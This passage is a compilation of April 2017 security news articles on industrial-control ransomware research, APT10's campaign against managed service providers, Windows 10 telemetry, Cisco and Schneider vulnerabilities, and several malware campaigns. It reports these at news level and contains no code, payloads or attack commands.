Once they obtain the session key, which is transmitted in clear text, attackers can replay the request and add arbitrary commands, including for starting and stopping the PLC, and downloading its ladder diagram.

CRITIFENCE has published a proof-of-concept (PoC) exploit showing how a remote attacker can execute arbitrary commands on a Schneider PLC. The company believes these types of flaws can be exploited in ransomware-style attacks where hackers threaten to wipe ladder diagrams from PLCs unless their demands are met.

This attack scenario, dubbed “ClearEnergy” by CRITIFENCE, has drawn criticism from some ICS security experts. CRITIFENCE initially led to believe that ClearEnergy attacks were actually spotted in the wild with a news article named “ClearEnergy ransomware aim to destroy process automation logics in critical infrastructure, SCADA and industrial control systems.” The company later clarified that it was only a PoC ransomware attack.


Microsoft Details Data Collection in Windows 10 Creators Update

6.4.2017 securityweek Privacy
Microsoft on Wednesday revealed details on the data collection practices that the next major Windows 10 version, set to arrive next week, will be collecting from computers.

Ever since first announcing Windows 10, the tech giant faced criticism for collecting a large amount of data on the usage of the platform and applications. In July 2016, France served notice to Microsoft to stop collecting excessive user data without consent on civil liberty grounds.

In September 2015, the company said that the collected data was meant to improve the overall user experience. Only months before, the company had boosted data collection in Windows 7 and Windows 8.

In January this year, the company took the wraps off a privacy dashboard, meant to provide users with increased visibility and control over the data collected by Microsoft services, and even allows them to clear the collected data if they want to.

At the time, Microsoft also revealed that Windows 10 Creators Update will simplify Diagnostic data levels, reduce data collected at the Basic level, and present only two data collection options to users: Basic and Full. The platform update will also bring increased privacy settings, Microsoft said in early March.

Only one week before Windows 10 Creators Update starts rolling out to users, Microsoft decided to provide specific information on the type of data it will be gathering from users’ computers based on the collection level selected.

“The Basic level gathers a limited set of information that is critical for understanding the device and its configuration including: basic device information, quality-related information, app compatibility, and Windows Store,” Microsoft’s Brian Lich explains.

Security level information is also collected as part of the Basic level, with all of the gathered information meant to help identify problems that can occur on a particular device hardware or software configuration.

When it comes to the Full level, the type of collected data expands dramatically beyond the data gathered in the Basic level, to include device, connectivity, and configuration data; products and services usage data; software setup and inventory data; browsing, search and query data; typing and speech data; and licensing and purchase data.

Thus, users who opt in for this data collection level will allow their Windows 10 machine to send information such as OS version, user ID, Xbox user ID, device ID, device properties and capabilities, app usage, device health and crash data, device performance and reliability data, device preferences and network info, installed applications, content consumption data, and information on purchases made on the device.

Facing increased scrutiny over its data collection practices, Microsoft appears determined to become more transparent on the matter, so as to ensure it doesn’t run into too much trouble, especially in the European Union, which last year started investigating the tech giant on user privacy-related issues. For that, the company also published a privacy statement.


Operation Cloud Hopper: China-based Hackers Target Managed Service Providers

6.4.2017 securityweek CyberCrime
Operation Cloud Hopper Targets Managed IT Service Providers and Their Clients

A widespread campaign known to be targeting managed service providers (MSPs) in at least fourteen countries has been tied to the group known as APT10 and is thought to be operating out of China. These are the conclusions of a new report published this week by PwC UK and BAE Systems.

As always with such reports, attribution is down to the weight of circumstantial evidence. The authors detail historical evidence that leads towards APT10, and domain registration timing evidence that suggests operation from within China's timezone. The authors do not suggest that APT10 is state-controlled, but they paint a picture that invites a conclusion that it is at least state-sponsored.

Part of the historical evidence includes an overlap in malware used in attacks previously attributed to APT10. The group is believed to have primarily used Poison Ivy before switching to PlugX; and used both for a period of about nine months. From around mid-2016 it started to 're-tool' and is now using PlugX, ChChes, Quasar and RedLeaves.

There are two big takeaways from this report (PDF): the reality that organizations are still not adequately securing their supply chain; and the potential that the US/China and UK/China agreements to curb economic espionage are now defunct.

The authors describe a campaign that uses well-researched spear-phishing to first compromise MSPs. From here they obtain legitimate credentials to access the MSPs' client networks that align to APT10's targeting profile -- which the authors claim aligns with China's current five-year plan (FYP) for economic growth.

Once on the target network, the attacker moves laterally to locate specific data of interest. This is collected and compressed before being moved back to the MSP and finally sent to a server under the attackers' control. This is a classic supply-chain attack, similar in concept to the iconic Target breach. Organizations are generally getting better at their own security but remain slack over the security of their suppliers -- in this case, their MSPs.

"It is fundamental for organizations to come to terms with the fact that raising their own security posture is essential but not sufficient," warns Donato Capitella, senior security consultant at MWR InfoSecurity; "especially if they are then willing to interweave their IT systems with third parties whose security posture is insufficient. Organizations have to mandate higher security standards if they do not want to see all of their security investment undermined by trivial security mistakes on behalf of their partners. At the same time, third parties that can demonstrably step up their security game will become preferred over time and will undoubtedly have a higher chance to win important contacts in the future.?"

The question over whether the US and UK accords with China over economic espionage is now defunct is posed, but not answered by the study. The US and UK are only two of fourteen countries affected, so they are not specifically targeted. It is MSPs in all of those countries that are the targets; and we are not told of any specific client organizations breached.

The two accords specify 'economic espionage'; political espionage is still acceptable in both directions. It is perfectly possible, if not likely, that MSPs compromised in America and Britain have not been used for economic gain. Without further information from the authors, we simply do not know.

It is likely that the attackers are the group known as APT10, and it is likely that they are based in China -- but unambiguous attribution and motivation is not possible based on this report. "Overall," comments Israel Barak, CISO of Cybereason, "the notion that China has decreased its efforts since 2015 to conduct economic espionage is preposterous. China is known for using cutouts and sympathetic agents to collect information on their behalf. China, Russia and other nation states frequently outsource wholesale hacking operations to individual groups and companies. In addition to their government services, these companies contract with, and provide services to, other clients. To do otherwise would greatly devalue the plausible deniability that is one of the major benefits of outsourcing. There are many reasons there is an uptick in outsourcing of operations because countries can rapidly expand capabilities in a short period of time, increase plausible deniability of actions, mitigate risk of detection, gain technical expertise that they cannot recruit directly into the government and decrease overall operational costs."

But whether this indicates the end of the two China accords is a different matter. "The most significant challenge for investigators in the UK or US is tying digital activity to a person and organization in this massive breach or any breach for that matter. In reality, we live in a world where as more and more state-sponsored activity is being conducted by corporations, attribution gets even more difficult. To reiterate, it is too early in this particular instance to determine whether the Cameron-Xi accord was broken or is it simply a case of competitive intelligence and cybercrime that must be dealt with bilaterally between Great Britain and China."


Microsoft Finally Reveals What Data Windows 10 Collects From Your PC
6.4.2017 thehackernews Privacy
Since the launch of Windows 10, there has been widespread concern about its data collection practices, mostly because Microsoft has been very secretive about the telemetry data it collects.
Now, this is going to be changed, as Microsoft wants to be more transparent on its diagnostics data collection practices.
Till now there are three options (Basic, Enhanced, Full) for Windows 10 users to select from under its diagnostics data collection section, with no option for users to opt out of sending their data to Microsoft.
Also, the company has never said precisely what data it collects behind these options, which raised huge privacy concerns among privacy-conscious users.
But now for the first time, Microsoft has revealed what data Windows 10 is collecting from your computer with the release of the Windows 10 Creators Update, bringing an end to nearly two years of its mysterious data collection practices.
The Windows 10 Creators Update, which will be available from April 11 for users to download for free, comes with a revamped Privacy settings section.

During the process of upgrading to the Creators Update, you will be displayed a new Privacy Settings screen that will ask you to toggle the following features:
Location – Allow Windows and apps to request your location and share that data with Microsoft.
Speech Recognition – Allow Cortana and Windows Store apps to recognize your voice and send that data to Microsoft to improve speech recognition.
Tailored experiences with diagnostic data – Allow Microsoft to use diagnostic data from your computer to offer tips and recommendations.
Relevant ads – Allow apps to use advertising IDs to show ads more interesting to you based on your app usage.
What's more? On Wednesday, Microsoft published a massive list of diagnostics data – both the Basic and Full levels of diagnostics – on its TechNet site, showing what data gets collected.
Basic – The Basic level collects a limited set of data that is critical for understanding the device and its configuration. This data includes basic device information, quality-related information, app compatibility, and Windows Store.
Full – The Full level collects data for the following nine categories: common data; software setup and inventory data; product and service usage data; browsing, search and query data; content consumption data; linking, typing, and speech utterance data; and licensing and purchase data.

Windows chief Terry Myerson said in a blog post published Wednesday that Microsoft hoped the transparency would allow users to make "more informed choices" as the company starts rolling out its new Creators update to the operating system.
This more transparency in gathering diagnostic data after two years of the Windows 10 release is likely Microsoft's response to European Union regulators that's publicly pressuring the company about its privacy practices for the past year.
In February, European Union regulators said they're still unsatisfied with the privacy changes announced by Microsoft and seeking further clarification from the company.
Marisa Rogers, the privacy officer of the Microsoft's Windows and Devices Group, said that the company is planning to "share more information about how [it] will ensure Windows 10 is compliant with the European Union's General Data Protection Regulation."


No More Ransom — 15 New Ransomware Decryption Tools Available for Free
6.4.2017 thehackernews Virus
No More Ransom, so is the Ransomware Threat.
Launched less than a year ago, the No More Ransom (NMR) project has increased its capacity with new partners and new decryption tools added to its now global campaign to combat Ransomware.
Started as a joint initiative by Europol, the Dutch National Police, Intel Security and Kaspersky Lab, No More Ransom is an anti-ransomware cross-industry initiative to help ransomware victims recover their data without having to pay ransom to cyber criminals.
The online website not just educates computer users to protect themselves from ransomware, but also provides a collection of free decryption tools.
Since December, more than 10,000 victims from all over the world have been able to decrypt their locked up devices without spending a penny, using ransomware decryption tools available free of charge on this platform.
Statistics show that most of the website visitors were from Russia, the Netherlands, the U.S., Italy, and Germany.
The platform is now available in 14 languages and hosts 40 free decryption tools, supplied by a range of member organizations, which can be used by users to decrypt their files which have been locked up by given strains of ransomware.

No More Ransom initiative has been joined by thirty new organizations, including Avast, CERT Polska and Eleven Paths (the Telefonica Cyber Security Unit), which shows that the threat is a worldwide issue that needs to be fought together.
The initiative has also welcomed new law enforcement organizations from Interpol, Australia, Belgium, Israel, South Korea, Russia, and Ukraine.
Since December 2016, 15 new ransomware decryption tools have been added to the online portal by partner organizations, offering more decryption possibilities to the victims:
AVAST: Alcatraz Decryptor, Bart Decryptor, Crypt888 Decryptor, HiddenTear Decryptor, Noobcrypt Decryptor and Cryptomix Decryptor
Bitdefender: Bart Decryptor CERT Polska: Cryptomix/Cryptoshield decryptor
CheckPoint: Merry X-Mas Decryptor and BarRax Decryptor
Eleven Paths: Telefonica Cyber Security Unit: Popcorn Decryptor.
Emsisoft: Crypton Decryptor and Damage Decryptor.
Kaspersky Lab: Updates on Rakhni and Rannoh Decryptors.
Previously available in English, Dutch, French, Italian, Portuguese and Russian, the No More Ransom site has now added new languages including Finnish, German, Hebrew, Japanese, Korean, Slovenian, Spanish and Ukrainian.
More languages are also expected to be made available soon to assist victims across the world better.


Cisco Patches Critical Flaw in Aironet Access Points

6.4.2017 securityweek Vulnerebility
Cisco published an advisory on Wednesday to warn customers that some of the company’s Aironet access points are affected by a critical flaw that could allow an attacker to take complete control of a vulnerable device.

The security hole, tracked as CVE-2017-3834, involves the existence of default credentials that can be used by a remote attacker who has layer 3 connectivity to log in to a device with elevated privileges via SSH.

The vulnerability impacts Cisco Aironet 1830 and 1850 series APs running an 8.2.x version of the Mobility Express software prior to 8.2.111.0. The company pointed out that the weakness can be exploited regardless of whether the device is configured as a master, subordinate or standalone AP.

Cisco has also informed customers of a medium severity shell bypass vulnerability affecting Aironet 1800, 2800 and 3800 series APs. A local attacker with root privileges can exploit the flaw to gain root access to the underlying Linux operating system. This root shell is designed only for advanced troubleshooting and it should not be available to any user, even if they have root privileges.

The networking giant has also published advisories detailing three high severity denial-of-service (DoS) vulnerabilities affecting its Wireless LAN Controller (WLC) software.

These security holes affect the Wireless Multimedia Extensions (WME), IPv6 UDP ingress packet processing, and the web management interface components of the WLC software. Remote or adjacent attackers can exploit the flaws without authentication.

Cisco has released software updates for each of the affected WLC versions. Workarounds are not available.

Most of these vulnerabilities were discovered by Cisco itself and the company said there was no evidence of exploitation in the wild.


Be careful, Cisco Mobility Express is shipped with some Cisco Aironet devices has a hard-coded password. Fix it!
6.4.2017 securityaffairs Vulnerebility

The Mobility Express Software shipped with Cisco Aironet 1830 Series and 1850 Series access points has a hard-coded admin-level SSH password.
Yesterday I wrote about SCADA systems that are currently shipped with an unchangeable hard-coded password, and today I’m here to discuss you a similar problem.

The Mobility Express Software developed by the IT giant CISCO that is shipped with Aironet 1830 Series and 1850 Series access points has a hard-coded admin-level SSH password.

Cisco Aironet Cisco Mobility Express

The presence of default credentials could be exploited by attackers to remotely exploit a “layer 3 connectivity to an affected device”.

“A vulnerability in Cisco Aironet 1830 Series and Cisco Aironet 1850 Series Access Points running Cisco Mobility Express Software could allow an unauthenticated, remote attacker to take complete control of an affected device.” reads the security advisory. “The vulnerability is due to the existence of default credentials for an affected device that is running Cisco Mobility Express Software, regardless of whether the device is configured as a master, subordinate, or standalone access point. An attacker who has layer 3 connectivity to an affected device could use Secure Shell (SSH) to log in to the device with elevated privileges. A successful exploit could allow the attacker to take complete control of the device”

To discover which release of Cisco Mobility Express Software is running on your device you can use the Cisco Mobility Express wireless controller web interface or the CLI.
The release number is available in the section under the web interface under Management > Software Update.

The security advisory published by the company is part of a wider set that addresses security issued for the Aironet 1830/1850 series.

The problem affects every access point running the 8.2.x release of Cisco Mobility Express Software prior to Release 8.2.111.0., regardless of whether the device is configured as a master, subordinate, or standalone access point.

CISCO has released free software updates that fixed the flaw described in the advisory. It is important to remind that customers may only install and receive support for software versions for which they have purchased a license.

Other security issues related the Aironet technology are:

An input validation bug in the Cisco Wireless LAN Controller (WLC);
An IPv6 UDP denial-of-service (DoS) vulnerability in the WLC; and
A DoS vulnerability in the WLC’s management GUI.
Cisco has already issued security fixes to patch the above problems.


United Cyber Caliphate published a kill list of 8,786 individuals in US, UK
6.4.2017 securityaffairs CyberCrime

Members of the United Cyber Caliphate (UCC) pro-ISIS hacker group has released a new kill list with 8,786 targets in US, UK
The pro-ISIS hacking group United Cyber Caliphate (UCC) has released a “kill list” containing the names and addresses of 8,786 individuals in the U.S. and UK. The group published a shocking video online calling for lone wolf attacks on the individuals in the list.

“Kill them wherever you find them.” states the message published by the United Cyber Caliphate (UCC).

The video starts with a warning for the United States:

“We have a message to the people of the U.S. and most importantly your President Trump,” the text on the screen reads.

“Know that we continue to wage war against you. Know that your counter attacks only make us stronger. The UCC will start a new step in this war against you,” the message said.

According to according to the terror monitor SITE, the United Cyber Caliphate (UCC) first announced the release of the kill list through a private group on Telegram, then published it after a few minutes.

“More than 7,000 of the names were from the U.S.,” a source from the cyber department at SITE told Fox News on Wednesday.

“We’re trying to determine where the list came from and also identify a common theme among all the individuals,” states a spokesman from SITE.

United Cyber Caliphate

Intelligence experts are evaluating the real danger for the people included in the kill list, in the past, the same group of hackers has shared other lists.

“This group has released several ‘kill lists’ in the past and so far there’s been no confirmed incident of someone on the list being directly targeted or attacked,” the source said.

On March 16, 2017, the United Cyber Caliphate (UCC) published a video to announce the death of it leader, Osed Agha, who was killed during a US airstrike. The video promised retaliation for the death of the UCC leader.

Pierluigi Paganini

(Security Affairs – Kill list, United Cyber Caliphate)

View image on Twitter
View image on Twitter
Follow
TRACterrorism.org @TRACterrorism
United Cyber Caliphate Announces Death of Osed Agha (Hacker IS Kill-List Creator)http://ow.ly/1nSU30a2SiQ
2:05 PM - 19 Mar 2017


Crooks took control over operations of a Brazilian bank for 5 hours
5.4.2017 securityaffairs CyberCrime

Cyber criminals launched a sophisticated cyber heist that compromised the entire DNS infrastructure of a major Brazilian Bank.
A cyber criminal organization took over online service of a major Brazilian bank for five hours. The hackers compromised the bank DNS system and intercepted all the connections to the financial institution.

According to Kaspersky Lab who investigated the incident, the attack was very sophisticated, attackers used a valid SSL digital certificates and Google Cloud to support the phony bank infrastructure.


Kaspersky Lab did not disclose the name of the bank that was victim of the attack.Crooks compromised 36 domains belonging to the bank, including internal email and FTP servers.
The hackers took control of the bank’s DNS account after they have compromised the bank’s Domain Name Service (DNS) provider Registro.br.

It is still unclear how hackers compromised the DNS provider, but the experts believe the cyber attacks began at least five months prior to the day of the hack.

The attack occurred on October 22, 2016 and lasted five hours during which the attackers captured the transaction of hundreds of thousands or possibly millions of the bank’s customers worldwide. When the bank customers tried the accessed the online services offered by the bank they were infected with a malware posing as a Trusteer banking security plug-in application.

The malware was designed to disable victim’s security solutions and steal login credentials, email contact lists, and email and FTP credentials.

The experts explained that it is the first time they observed a so massive attack.

“As far as we know, this type of attack has never happened before on such a big scale,” explained Dmitry Bestuzhev, director of Kaspersky Lab’s research and analysis team in Latin America.

The experts at Kaspersky highlighted the DNS provider Registro.br fixed a cross-site request forgery flaw on its website in January, it is possible the attackers have exploited the flaw for the attack.

“Maybe they [the attackers] exploited the vulnerability on that website and got control. Or … We found several phishing emails targeting employees of that registrar, so they could have spear-phished them,” added Kaspersky. “We don’t know how exactly they originally compromised” the DNS provider, he says.

A disconcerting aspect of the story is the fact that the Brazilian bank didn’t enable the two-factor authentication option implemented by Registro.br.

The malicious code targets a specific list of other banks in many countries, including Brazil, US, the UK, Japan, Portugal, Italy, China, Argentina, and the Cayman Islands.

The attackers used a modular malware that could infect both Windows and Mac OSs.

The malware was identified as Trojan-Downloader.Java.Agent; Trojan.BAT.Starter; not-a-virus:RiskTool.Win32.Deleter; and Trojan-Spy.Win32.Agent.

The crooks also launched a phishing campaign against specific bank clients during the five-hour attack.

The stolen information was sent by hackers to a server in Canada,

Kaspersky suspects the involvement of a sophisticated Brazilian cybercrime gang.

“They spent five months just waiting. This is not someone who is a newbie,” added Bestuzhev.


ClearEnergy ransomware aim to destroy process automation logics in critical infrastructure, SCADA and industrial control systems.
5.4.2017 securityaffairs ICS

Schneider Electric, Allen-Bradley, General Electric (GE) and more vendors are vulnerable to ClearEnergy ransomware.
Researchers at CRITIFENCE® Critical Infrastructure and SCADA/ICS Cyber Threats Research Group have demonstrated this week a new strain of ransomware attack aiming to erase (clear) the ladder logic diagram in Programmable Logic Controllers (PLCs). The ransomware a.k.a ClearEnergy affects a massive range of PLC models of world’s largest manufacturers of SCADA and Industrial Control Systems. This includes Schneider Electric Unity series PLCs and Unity OS from version 2.6 and later, other PLC models of leading vendors include GE and Allen-Bradley (MicroLogix family) which are also found to be vulnerable to the ransomware attack.

Ransomware is a type of malware that infects computers and encrypts their content with strong encryption algorithms, and then demands a ransom to decrypt that data. “ClearEnergy attack is based on the most comprehensive and dangerous vulnerability that ever found in Critical Infrastructure, SCADA and ICS Systems, and affects a wide range of vulnerable products from different manufacturers and vendors. These attacks target the most important assets and critical infrastructure and not just because they are easy to attack but also hard to be recovered”. Says Brig. Gen. (ret.) Rami Ben Efraim, CEO at CRITIFENCE.

In 2016 we have seen a rise in ransomware, where the victims were businesses or public organizations that on one hand had poor security and on the other hand the alternative cost of losing business continuity was high. Last year there were reports of a targeted ransomware for PC and other workstation within critical infrastructure, SCADA and industrial control systems. A month ago, scientists from the School of Electrical and Computer Engineering in Georgia Institute of Technology have simulated a proof-of-concept ransomware attack (LogicLocker) in a limited scope designed to attack critical infrastructure, SCADA and industrial control systems.

ClearEnergy acts similarly to other malicious ransomware programs that infect computers and encrypts their content with strong encryption algorithms, and then demands a ransom to decrypt that data back to its original form, with one major difference. ClearEnergy is a malicious ransomware attack designed to target Critical Infrastructure and SCADA systems such nuclear and power plant facilities, water and waste facilities, transportation infrastructure and more.

“Although the codename ClearEnergy, the vulnerabilities behind ClearEnergy ransomware takes us to our worst nightmares where cyber-attacks meets critical infrastructure. Attackers can now take down our electricity, our water supply and our oil and gas infrastructure by compromising power plants, water dams and nuclear plants. Critical Infrastructure are the place in which terrorists, activists, criminals and state actors can make the biggest effect. They have the motivation, and ClearEnergy shows that they have also the opportunity.” Says Brig. Gen. (ret.) Rami Ben Efraim, CEO at CRITIFENCE.

Once ClearEnergy is executed on the victim machine it will search for vulnerable PLCs in order to grab the ladder logic diagram from the PLC and will try to upload it to a remote server. Finally ClearEnergy will start a timer that will trigger a process to wipe the logic diagram from all PLCs after one hour unless the victim will pay in order to cancel the timer and to stop the attack.

SCADA and Industrial Control Systems has been found to be weak in the recent years, against numerous types of attacks that result in damages in a form of loss of service which translate to a power outage, or sabotage. The damage that ClearEnergy attack can cause to the critical infrastructure is high since it can cause a power failure and other damages to field equipment, thus making the recovery process slow in most cases, and might even bring a plant to a halt.

ClearEnergy, which is based on vulnerabilities CVE-2017-6032 (SVE-82003203) and CVE-2017-6034 (SVE-82003204) that have been discovered by CRITIFENCE security researchers, disclosed profound security flaws in the UMAS protocol of the vendor Schneider Electric. UMAS protocol seems to suffer from critical vulnerabilities in the form of bad design of the protocol session key, which results in authentication bypass. “UMAS is a Kernel level protocol and an administrative control layer used in Unity series PLC and Unity OS from 2.6. It relies on the Modicon Modbus protocol, a common protocol in Critical Infrastructure, SCADA and industrial control systems and used to access both unallocated and allocated Memory from PLC to SCADA system. What worries our researchers is that it may not be entirely patched within the coming years, since it affecta a wide range of hardware and vendors.” Says Mr. Eran Goldstein, CTO and Founder of CRITIFENCE.

Following to the disclosure, Schneider Electric has confirmed that the Modicon family of PLCs products are vulnerable to the findings presented by CRITIFENCE and released an Important Cybersecurity Notification (SEVD-2017-065-01). ICS-CERT, Department of Homeland Security (DHS) released an important advisory earlier this morning. The basic flaws, which was confirmed by Schneider Electric, allows an attacker to guess a weak (1-byte length) session key easily (256 possibilities) or even to sniff it. Using the session key, the attacker is able to get a full control of the controller, to read controller’s program and rewriting it back with the malicious code.

“The recovery process from this type of cyber-attacks can be very hard and slow in most cases due to lack of management resources in the field of SCADA and process automation. Slow recovery process multiplied by the number of devices need be fixed, as well configuration restoration makes the recovery processes very painful”. Says Mr. Alexey Baltacov, Critical Infrastructure Architect at CRITIFENCE

ClearEnergy

“Recovering from such an attack would be a slow and tedious process, and prone to many failures. Every plant using PLC’s which is part of a production line and would have dozens of these devices all around the plant. Let’s assume that each PLC is indeed backed-up to its recent configuration. It would take a painstakingly long time to recover each and every one of them to its original status.” Says Mr. Eyal Benderski, Head of the Critical Infrastructure and SCADA/ICS Cyber Threats Research Group at CRITIFENCE. “This restoration process would take a long time, on which the plant would be completely shut down. The costs of that shut down could be substantial, and for critical processes it could affect for more than the down-time, as it is the case with energy plants. Consider a process which relies on keeping a constant temperature for a biological agent or chemical process. Breaking the process chain could require re-initialization that may be days and weeks long. Furthermore, since dealing with the OT network is much more complicated for operational reasons, on many occasions plants don’t even have up-to-date backups, which would require complete reconfiguration of the manufacturing process. Given these complications, plants would very much prefer paying the ransom than dealing with the minor chance that the backups will work as expected. Lastly, let’s assume the backups went on-air as soon as possible, what would prevent the same attack from recurring, even after paying?”

About the author:


CRITIFENCE is a leading Critical Infrastructure, SCADA and Industrial Control Systems cyber security firm. The company developed and provides SCADAGate+ unique passive cyber security technology and solutions designed for Critical Infrastructure, SCADA and Industrial Control Systems visibility and vulnerability assessment, which allow to monitor, control and to analyze OT network cyber security events and vulnerabilities easily and entirely passively. CRITIFENCE development team and Critical Infrastructure and SCADA/ICS Cyber Threats Research Group combined from top experienced SCADA and cyber security experts and researchers of the IDF’s Technology & Intelligence Unit 8200 (Israel’s NSA) and the Israeli Air Force (IAF).

For more information about CRITIFENCE refer to: http://www.critifence.com


Google Patches 31 Critical Flaws in Android

5.4.2017 secureweek Vulnerebility

Google this week released security updates for Android to resolve numerous Critical remote code execution (RCE) and elevation of privilege (EoP) vulnerabilities in the platform.

Over 100 vulnerabilities were resolved in Android this month, split into two separate sets of patches. A total of 23 bugs were addressed with 2017-04-01 security patch level, including 6 Critical vulnerabilities, 9 rated High risk and 8 Moderate.

There were 6 Critical RCE issues affecting Mediaserver; High risk flaws such as EoPs in CameraBase, Audioserver, and SurfaceFlingerș Information disclosure in Mediaserver; and denial of service (DoS) vulnerabilities in libskia and Mediaserver.

The Moderate severity issues included EoP bugs in libnl and Telephony, along with Information disclosure vulnerabilities in Mediaserver, libskia, and Factory Reset. Overall, Google patched 15 flaws in Mediaserver this month, which proves once again that this is one of the most vulnerable components in Android, after the Stagefright bug was found in it almost two years ago.

The 2017-04-05 security patch level resolves a total of 79 vulnerabilities, 25 of which were rated Critical severity, 39 have a High rating, and 15 are considered Moderate risk, Google’s advisory reveals.

One of the most severe of these vulnerabilities was a RCE issue in Broadcom Wi-Fi firmware. Tracked as CVE-2017-0561 and found by Google Project Zero researcher Gal Beniamini, the issue impacts Nexus, Samsung, and smartphones from other vendors as well. Apple’s iOS was also impacted by the bug, and the company released an emergency fix for it earlier this week.

19 other Critical issues were addressed in various Qualcomm components and were released as part of Qualcomm AMSS security bulletins between 2014 and 2016 (a 20th vulnerability considered only High risk was also counted here in Google’s advisory).

The rest of the Critical flaws included RCE issues in kernel networking subsystem and Qualcomm crypto engine driver, along with EoP bugs in MediaTek touchscreen driver, HTC touchscreen driver, and kernel ION subsystem.

The remaining 38 High risk vulnerabilities in this patch level were mostly EoP bugs in kernel sound subsystem, and various drivers, but 2 RCE flaws (in v8 and Freetype), four information disclosure issues (in kernel memory and kernel networking subsystems, Qualcomm TrustZone, and Qualcomm IPA driver), and two DoS flaws (in kernel networking subsystem and Qualcomm Wi-Fi driver) were also resolved.

The 15 Moderate risk issues included EoP and information disclosure issues in various drivers from Qualcomm, Broadcom, and Nvidia (one EoP was addressed in HTC OEM fastboot command and one information disclosure was resolved in kernel media driver).


Flaws in Java AMF Libraries Allow Remote Code Execution

5.4.2017 secureweek Vulnerebility
Deserialization-related vulnerabilities found in several Java implementations of AMF3 can be exploited for unauthenticated remote code execution and XXE attacks, warned CERT/CC.

The security holes were reported to CERT/CC and vendors by Markus Wulftange, senior penetration tester at Code White. Patches have been made available for some of the affected products.

Serialization is the process where an object is converted to a stream of bytes in order to store or transmit that object to memory or a file. The process in which serialized data is extracted is called deserialization and it can lead to significant security flaws if not handled properly.

AMF3, the latest version of Adobe’s Action Message Format, is a compact binary format used to serialize ActionScript object graphs. AMF was first introduced in Flash Player 6 in 2001 and AMF3 has been around since Flash Player 9.

There have been several reports in the past few years about remote code execution vulnerabilities introduced in Java-based applications due to inadequate serialization implementations.

Wulftange has discovered that some Java implementations of AMF3 deserializers introduce potentially serious vulnerabilities, allowing unauthenticated attackers to remotely execute code or cause a denial-of-service (DoS) condition. An XXE flaw reported by the researcher can also lead to disclosure of sensitive data on the server.

CERT/CC’s advisory mentions three vulnerabilities. The first flaw allows an attacker who can spoof or control an RMI (Remote Method Invocation) server to execute code. This security hole is said to affect Atlassian’s JIRA, Exadel’s Flamingo, GraniteDS, Spring spring-flex, and WebORB for Java by Midnight Coders.

The second vulnerability can also be exploited for arbitrary code execution by an attacker who can spoof or control information. This weakness impacts Flamingo, Apache’s Flex BlazeDS and GraniteDS. The XXE flaw has been found to affect the same products along with WebORB.

Some of the vulnerable libraries, such as GraniteDS and Flamingo, have been discontinued. Atlassian and Apache have released patches for the flaws impacting their products.

According to CERT/CC, products from HPE, SonicWall and VMware could also be affected. The organization has advised developers to use versions of JDK that implement serialization blacklisting filters and ensure that their products properly handle deserialized data from untrusted sources.


Cyberspies Target Middle East With Windows, Android Malware

5.4.2017 secureweek Android
A cyberespionage group apparently not linked to any previously known threat actor has been using several Windows and Android malware families in attacks aimed at organizations in the Middle East.

The first report on this group’s activities was published last month by Chinese security firm Qihoo 360, which tracks the actor as APT-C-23 and Two-Tailed Scorpion. Researchers at Palo Alto Networks and ClearSky have also conducted a joint investigation into the gang’ operations.

According to the security firms, the group uses Windows and Android malware to spy on victims. Qihoo 360 said it observed nearly 85 percent of infections in Palestine, followed by Israel, but Palo Alto also reported seeing victims in Egypt and the United States.

As for the types of organizations targeted, Qihoo reported that educational institutions appeared to be the main target, followed by military organizations, while Palo Alto mentioned media companies.

Palo Alto Networks and ClearSky have dubbed the Windows malware families used by these cyberspies KASPERAGENT and MICROPSIA. The Android threats are being tracked as SECUREUPDATE and VAMP.

The attackers delivered their malware using fake news websites and spear-phishing emails containing Bit.ly shortened links. Two of the Bit.ly links analyzed by researchers had been clicked hundreds of times.

KASPERAGENT, named so based on a “Kasper” string found in several of the analyzed samples, is used as a reconnaissance tool and downloader for other payloads. However, some of the samples include additional capabilities that allow the hackers to steal passwords from Chrome and Firefox, take screenshots, log keystrokes, execute arbitrary commands, exfiltrate files, and update the malware.

The second Windows malware family used by Two-Tailed Scorpion is MICROPSIA, which allows attackers to log keystrokes, capture screenshots, and steal Office documents.

Researchers initially found no connection between the two malware families, but they eventually uncovered a link: an email address used to register the command and control (C&C) domains.

Some of the domains registered with that email address were also found to host Android malware disguised as harmless applications. One of them is SECUREUPDATE, a backdoor that acts as a downloader for other malware.

The second Android malware is VAMP, which can record calls, harvest contact information, access messages, and steal documents from the infected device.

Both the Android and Windows malware attacks also involve phishing websites that attempt to trick users into handing over their credentials.

Palo Alto has discovered roughly 200 samples of the Windows malware and 17 Android malware samples. The security firm has been monitoring the threat since March 2016, but the KASPERAGENT malware had been used since at least July 2015.

“Through this campaign there is little doubt that the attackers have been able to gain a great deal of information from their targets,” explained Palo Alto Networks researchers. “The scale of the campaign in terms of sheer numbers of samples and the maintenance of several different malware families involved suggests a reasonably sized team and that the campaign is not being perpetrated by a lone wolf, but rather a small team attackers.”


Researchers Disclose Unpatched Flaws in Schneider Electric PLCs

5.4.2017 secureweek Vulnerebility
Researchers have disclosed the details of two vulnerabilities affecting some of Schneider Electric’s Modicon programmable logic controllers (PLCs) after the vendor failed to provide any status updates or feedback.

A team of experts from Germany-based OpenSource Security discovered the flaws in Schneider’s Modicon M221 PLCs, namely TM221CE16R running firmware version 1.3.3.3.

According to advisories published on Tuesday by the researchers, the vulnerabilities are critical and they can be easily exploited.

One of the flaws is related to the fact that the Project Protection feature, designed to prevent unauthorized access to project files, uses a hardcoded encryption key.

The project’s password is stored in an XML file that is encrypted using the AES algorithm in CBC mode. The problem is that the encryption key is the same for all systems and it cannot be changed, allowing an attacker to decrypt the XML file and obtain the password set by the user.

The password can then be used to access and modify a project via SoMachine Basic, the software designed for programming Modicon controllers.

The second vulnerability is related to the Application Protection feature, which prevents the transfer of an application from a PLC to a SoMachine Basic project. Researchers discovered that sending a simple command via Modbus to the controller on TCP port 502 will return the Application Protection password in clear text.

The password can be used via the SoMachine software to download applications from the controller, modify them and upload them back to the device.

The researchers said they reported their findings to Schneider Electric on December 23, but the only information they got from the vendor was the confirmation that the vulnerability report had been received.

Contacted by SecurityWeek, Schneider Electric admitted making a mistake and promised to share mitigation advice for these flaws as soon as possible on its cybersecurity support portal.

“Schneider Electric acknowledges the security note on its product Modicon TM221CE16R, Firmware 1.3.3.3, disclosed by OpenSource Security,” the company said in an emailed statement.

